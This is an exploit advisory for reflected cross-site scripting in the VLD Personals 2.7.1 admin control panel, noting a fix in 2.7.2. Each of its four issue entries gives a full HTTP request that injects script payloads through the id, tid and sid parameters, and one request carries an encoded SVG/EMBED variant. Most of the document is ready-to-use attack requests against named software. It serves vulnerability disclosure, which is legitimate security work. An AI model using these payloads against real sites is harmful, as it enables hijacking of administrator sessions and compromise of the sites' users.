# Exploit Title: VLD Personals – Cross Site Scripting ( Reflective ) with admin authentication.
# Notified VLD Personals Date: 02/FEB/2015

# Exploit Author: Mr T
# Exploit Authors Website: http://www.securitypentester.ninja
# Vendor Homepage: http://www.vldpersonals.com/
# Software Link: http://www.vldpersonals.com/clients/downloads.php
# Vulnerable Version: 2.7.1
# Fixed Version 2.7.2
# Tested on: Windows / Linux

Issue detail No # 1

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d462a”><script>alert(1)</script>d1641 was submitted in the id parameter. This input was echoed unmodified in the application’s response.

GET:/cp/index.php?what=<EMBED%20SRC%3d”data%3aimage%2fsvg%2bxml%3bbase64%2cPHN2ZyB4bWxuczpzdmc9Imh0dH%20A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv%20MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs%20aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIG11793><script>alert(1)<%2fscript>6a629&where=all&submit=Submit&issearch=1&m=search&p=search HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/cp/index.php?m=search&p=manage
Cookie: PHPSESSID=69bh6cfhtjh79a5ahfivgubjd3; sessdata=0
Connection: keep-alive

Issue detail No # 2

The value of the tid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77308″><script>alert(1)</script>7ab63 was submitted in the tid parameter. This input was echoed unmodified in the application’s response.
GET: /cp/index.php?m=profilegroups&p=edit&tid=77308″><script>alert(1)<%2fscript>7ab63&id=11 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/cp/index.php?m=profilegroups&p=manage&tid=1
Cookie: PHPSESSID=69bh6cfhtjh79a5ahfivgubjd3; sessdata=0

Connection: keep-alive
Issue detail No # 3

The value of the sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99c5″><script>alert(1)</script>d481d was submitted in the sid parameter. This input was echoed unmodified in the application’s response.
GET /cp/index.php?m=membersvideos&p=edit&id=5513&sid=a99c5″><script>alert(1)<%2fscript>d481d HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/cp/index.php?m=videos&p=videos
Cookie: PHPSESSID=69bh6cfhtjh79a5ahfivgubjd3; sessdata=0
Connection: keep-alive

 

 

Issue detail No # 4
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d462a”><script>alert(1)</script>d1641 was submitted in the id parameter. This input was echoed unmodified in the application’s response.
GET /cp/index.php?m=membersvideos&p=edit&id=d462a”><script>alert(1)<%2fscript>d1641&sid=287 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/cp/index.php?m=videos&p=videos
Cookie: PHPSESSID=69bh6cfhtjh79a5ahfivgubjd3; sessdata=0
Connection: keep-alive